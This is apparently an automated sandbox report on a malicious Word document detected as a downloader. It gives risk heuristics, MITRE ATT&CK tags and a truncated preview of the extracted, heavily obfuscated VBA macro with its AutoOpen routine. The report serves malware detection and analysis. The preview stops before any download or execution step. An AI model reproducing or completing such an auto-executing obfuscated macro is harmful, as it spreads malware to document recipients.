MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. Heuristics indicate the macro uses GetObject, a common technique for executing code. The ClamAV detection name 'Doc.Downloader' strongly suggests the macro's purpose is to download and execute a secondary payload, aligning with the Spearphishing Attachment initial access vector.
Heuristics 7
-
ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 80835 bytes |
SHA-256: e4da2e35cb68d2bdfbbf1761b8adcacc21f6e544832491abbeed5e4548ee5ba5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub SygoxoFerAZeRywEjuquLy()
UQyKUVOluCUpIgy = InStr("siwExunvAvAae", "siwExunvAvAaesiwExunvAvAae")
Dim zUziaeVOJIbihEHiCRuXOX
zUziaeVOJIbihEHiCRuXOX = Rnd(113)
If zUziaeVOJIbihEHiCRuXOX > 37230 Then
zUziaeVOJIbihEHiCRuXOX = Exp(3)
End If
Dim hyRaTAmOTEC
Dim BesUSamuinaZUNEdYdU
BesUSamuinaZUNEdYdU = Log(9)
BesUSamuinaZUNEdYdU = BesUSamuinaZUNEdYdU + Log(10)
wEkIVuryVUhEwiKeF = InStr("wOFUvULINuQA", "wOFUvULINuQAwOFUvULINuQA")
hyRaTAmOTEC = Rnd(123)
If hyRaTAmOTEC > 62798 Then
hyRaTAmOTEC = Exp(3)
Debug.Print "QijOJyBYtAcuiiMeMyKYgu"
End If
BubOWUMUFInugMIgYiExug = Val("12083.5") & "ShObAPYCiHiVfACiMaV"
kIHtuJeGUiuXUZUfyC = 61602
Dim ocisUXiCOPi
ocisUXiCOPi = Log(9)
ocisUXiCOPi = ocisUXiCOPi + Log(12)
Dim WADuNAGOgogodyZuWAKoN
For WADuNAGOgogodyZuWAKoN = 9 To 13
Dim LipYFyjyJYaiSEBOdADAT
LipYFyjyJYaiSEBOdADAT = Fix(52671)
Next
End Sub
Sub AutoOpen()
cijUQuGEzYke = Val("77819.8") & "JiwEcazEKkaso"
nAbOCKoHozEgEHeDUqAz = InStr("zYLuXiwAHEgyNADUganEw", "zYLuXiwAHEgyNADUganEwzYLuXiwAHEgyNADUganEw")
On Error Resume Next
Dim syBuGIpEMyluHU
For syBuGIpEMyluHU = 3 To 10
Dim nOtASoilOv
nOtASoilOv = Fix(41982)
Next
Dim qyqOVeRyfeV
qyqOVeRyfeV = Rnd(122)
Dim DaJAconYDacywEQa
DaJAconYDacywEQa = Log(6)
DaJAconYDacywEQa = DaJAconYDacywEQa + Log(10)
Debug.Print "aJaTQAiag"
If qyqOVeRyfeV > 64535 Then
xItAQigYsASYCOPyvYwiMu = Val("37527.5") & "aiFUmEZuDiOquzArega"
Dim nomOBYXaRaS
For nomOBYXaRaS = 3 To 10
Dim dXUhUlAGUSIaySodYtogumI
dXUhUlAGUSIaySodYtogumI = Fix(7954)
Next
qyqOVeRyfeV = Exp(2)
Debug.Print "FYmaMyjiDEQOVyk"
End If
Dim QIQaHIJeiELYlEg
QIQaHIJeiELYlEg = Log(6)
QIQaHIJeiELYlEg = QIQaHIJeiELYlEg + Log(10)
Dim safibyVAbymIgahywoi
safibyVAbymIgahywoi = Log(3)
safibyVAbymIgahywoi = safibyVAbymIgahywoi + Log(12)
KeTEjibyQEb = ""
Dim aibbpYqycuw
aibbpYqycuw = Log(10)
aibbpYqycuw = aibbpYqycuw + Log(12)
TAafENYpafOjeqyXEaa = InStr("MZoBelEbOmIPyN", "MZoBelEbOmIPyNMZoBelEbOmIPyN")
Dim KUcIgUxakyXOzIFiyROTIla
hYIrItEMAfixYP = Val("57402.5") & "lEhukyEbuKEviMAwyba"
KUcIgUxakyXOzIFiyROTIla = Log(5)
Dim PuHijiDyRYmigAxUROW
PuHijiDyRYmigAxUROW = Rnd(128)
If PuHijiDyRYmigAxUROW > 71603 Then
PuHijiDyRYmigAxUROW = Exp(8)
End If
Dim BavUcAQUGETaByjEM
BavUcAQUGETaByjEM = Rnd(109)
If BavUcAQUGETaByjEM > 52698 Then
BavUcAQUGETaByjEM = Exp(9)
End If
KUcIgUxakyXOzIFiyROTIla = KUcIgUxakyXOzIFiyROTIla + Log(11)
Dim wiMEPEmiJOPaBeGYS
wiMEPEmiJOPaBeGYS = Rnd(103)
If wiMEPEmiJOPaBeGYS > 84597 Then
wiMEPEmiJOPaBeGYS = Exp(3)
End If
iSIdIJoxiVE = InStr("GatuxapelUhErYDIH", "GatuxapelUhErYDIHGatuxapelUhErYDIH")
JiCYoioFupaJaCi = Val("41175.7") & "aimOtootIkajeHydYzo"
Dim iaVaJeRUMaCIw
iaVaJeRUMaCIw = Log(1)
iaVaJeRUMaCIw = iaVaJeRUMaCIw + Log(10)
Dim LYOlOTIlomamemU
For LYOlOTIlomamemU = 10 To 10
Dim kAgjAfOsuLiN
kAgjAfOsuLiN = Fix(42859)
Next
Dim ChqUhaxYNeWecUnYaib
For ChqUhaxYNeWecUnYaib = 8 To 13
Dim DebAcuCivonYjelYj
DebAcuCivonYjelYj = Fix(21505)
Next
guveiozAnitXIHir = Val("77387.2") & "toaiwEmETAHyXAiYFu"
KeTEjibyQEb = KeTEjibyQEb + IIf((35 + 70) = 105, "s", "fwrBr")
Dim KGsAkeWAvaf
For KGsAkeWAvaf = 6 To 13
Dim mUfYvYbOnwygoiOpoKUtUa
mUfYvYbOnwygoiOpoKUtUa = Rnd(109)
If mUfYvYbOnwygoiOpoKUtUa > 55064 Then
mUfYvYbOnwygoiOpoKUtUa = Exp(9)
End If
Dim qiZENEBaNopOLEXEnBuGyo
COWiXyXimynygXUZO = Val("64571.6") & "HYbyFosoCyqIkyCFip"
DIvYQywADeCaSy = InStr("mAToQUzUpoDTeRAyDIx", "mAToQUzUpoDTeRAyDIxmAToQUzUpoDTeRAyDIx")
qiZENEBaNopOLEXEnBuGyo = Fix(79105)
Next
VorUWYrIbAfoDK = Val("96563.10") & "VYXyvAVunIrYgYPozuPIS"
beEBiMiMUmeGNO = 29980
Debug.Print "vinAtUvAfeOBE"
Dim sOMUpeVUtFiquDeRYJeGum
sOMUpeVUtFiquDeRYJeGum = Rnd(122)
If sOMUpeVUtFiquDeRYJeGum > 59252 Th
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.